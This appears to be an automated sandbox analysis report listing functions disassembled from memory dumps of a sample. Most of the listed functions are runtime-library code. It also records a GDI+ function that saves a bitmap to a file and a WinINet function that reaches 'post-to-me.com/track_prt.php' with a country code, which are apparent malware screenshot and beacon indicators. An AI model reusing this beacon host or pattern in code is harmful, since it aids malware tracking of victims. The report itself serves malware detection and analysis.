API String ID: 3033488037-0
Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction ID: 3a202983dff21fc983d364a95c4abf64c7aec59458cd5694cbdd92aab9228a26
Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
Instruction Fuzzy Hash: EE518F71A00304AFDB21DF2AD851BABB7F5EB49724F14166FE849D7250E732E901CB90

Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

_free.LIBCMT ref: 00430B4F
_free.LIBCMT ref: 00430B66
_free.LIBCMT ref: 00430B85
_free.LIBCMT ref: 00430BA0
_free.LIBCMT ref: 00430BB7

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88

Function 024D1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024D17B4
_free.LIBCMT ref: 024D17D4

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: 7d25a92a1786074f515879a5527539b43b381cfad3f68e5ea94a7a4adf3cb950
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: 6341D036A003049FCB24DF79C990A9EB7F6EF89714B1545AEE919EB391D731E901CB80

Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043154D
_free.LIBCMT ref: 0043156D

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84

Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
__alloca_probe_16.LIBCMT ref: 00436922
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
__freea.LIBCMT ref: 0043698E

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94

Function 024BB12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 024BB152

Part of subcall function 024B1188: _SpinWait.LIBCONCRT ref: 024B11A0

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024BB166
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024BB198
List.LIBCMT ref: 024BB21B
List.LIBCMT ref: 024BB22A

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction ID: 314aa170d5811cf34a7880d1573550a53ea6273139738289f04e41c1c01b4215
Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
Instruction Fuzzy Hash: DE314432E00616DFCB16EFA5C9906EEBBB2FF04348B04406FC8156B641CB716A04CFA0

Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 0041AEEB

Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
List.LIBCMT ref: 0041AFB4
List.LIBCMT ref: 0041AFC3

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A

Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
GdipAlloc.GDIPLUS(00000010), ref: 00402072
GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024A50C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024A50A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A50B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 024A511C
__Getcoll.LIBCPMT ref: 024A512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024A513B

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 132e33493d37a61ad23d39b66e92e7e738ea89c8d8244e3337d582f969db8709
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: 472166B2D18204AFDB41EFA5C4A47ADB7B1BF60715F50841FE485AB280DB749544CF91

Function 024D21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(024ADAD7,024ADAD7,00000002,024CED35,024D3951,00000000,?,024C6A05,00000002,00000000,00000000,00000000,?,024ACF88,024ADAD7,00000004), ref: 024D21CA
_free.LIBCMT ref: 024D21FF
_free.LIBCMT ref: 024D2226
SetLastError.KERNEL32(00000000,?,024ADAD7), ref: 024D2233
SetLastError.KERNEL32(00000000,?,024ADAD7), ref: 024D223C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 8849f2efac1327e62b858a0a22b499c81cef013eaee00acc32b23fbe8b2ea7ef
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: EA01F9362457003B9712AB356C64F2F262EABD2B72710013FFC1596392EFF08806852A

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024D2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024CA9EC,?,00000000,?,024CCDE6,024A247E,00000000,?,00451F20), ref: 024D2145
_free.LIBCMT ref: 024D2178
_free.LIBCMT ref: 024D21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024D21B9

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 92083e99463eef88a493b12fe4d5dc76b9a37604355ea29bce682a02996fd1d8
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: A7F0A93514460037D3176735AC28B1F262A5FC2F63F25412FFD1993391EFE18512852A

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 024B7B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024B29A4: TlsGetValue.KERNEL32(?,?,024B0DC2,024B2ECF,00000000,?,024B0DA0,?,?,?,00000000,?,00000000), ref: 024B29AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024B7BB1

Part of subcall function 024C121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024C1241
Part of subcall function 024C121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024C125A
Part of subcall function 024C121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024C12D0
Part of subcall function 024C121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024C12D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024B7BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024B7BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024B7BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 024B7BF1

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: cac31cb7e2f77960504ee46ec1cadcd83f6a60f9e2d9d6a85c4f454143adee18
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 35F0C23660461867CE17F77688509EEF62BDFC0B18B10416FD80153350DF649E058EB2

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 024DA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024DA0C4

Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9

_free.LIBCMT ref: 024DA0D6
_free.LIBCMT ref: 024DA0E8
_free.LIBCMT ref: 024DA0FA
_free.LIBCMT ref: 024DA10C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 882ee1982e7aeb90853af9030366d3b6d112c9d6fa0e5ec3dbbc31a89a03b9b0
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 27F06232605220AB8771EF55F8D6C0B77DAAA04750764095BF008D7B11CB71F890CE5A

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024D1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024D19AF

Part of subcall function 024D36D1: HeapFree.KERNEL32(00000000,00000000,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?), ref: 024D36E7
Part of subcall function 024D36D1: GetLastError.KERNEL32(?,?,024DA35F,?,00000000,?,00000000,?,024DA603,?,00000007,?,?,024DA9F7,?,?), ref: 024D36F9

_free.LIBCMT ref: 024D19C1
_free.LIBCMT ref: 024D19D4
_free.LIBCMT ref: 024D19E5
_free.LIBCMT ref: 024D19F6

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 020931c347d2c62dd21e2570ef4b29f71a76ef447d2a9967f5aad5f8accc4a4b
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 6CF01D74D043109B9F616F15BD904053F61AF09B2270002ABF406977B2C774E862DF8E

Function 024BCF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024BCF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024BCF67
GetCurrentThread.KERNEL32 ref: 024BCF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024BCF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024BCF8C

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: b3b6438bc59fa6f001ddf6d4a55259c4dee4f28243aacb12f69b7f0401727091
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 53F03036600900DFCA27EF62EA949FBB7B6AFC4610350459FE58B07690CF21A947DB71

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4887478876.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sqJIHyPqhr.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 024A2E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 024A2E8E

Part of subcall function 024A1321: _wcslen.LIBCMT ref: 024A1328
Part of subcall function 024A1321: _wcslen.LIBCMT ref: 024A1344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024A30A1

Strings

https://post-to-me.com/track_prt.php?sub=, xrefs: 024A2EBE, 024A2FEA, 024A3059
&cc=DE, xrefs: 024A301B, 024A3021, 024A307E

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 1588d28ff87476eb7752d38a8c28b080ddefd44ee739cc46a7c9e4707613687f
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 43515195E55344A8E320EFB0BC56B723378FF58712F10643BD518CB2B2E7A19984871E

Function 024C8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 024C896A
__IsNonwritableInCurrentImage.LIBCMT ref: 024C8A23

Strings

csm, xrefs: 024C8A0D
fB, xrefs: 024C8A15, 024C8A1E, 024C8A2F

Memory Dump Source

Source File: 00000000.00000002.4893812523.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24a0000_sqJIHyPqhr.jbxd

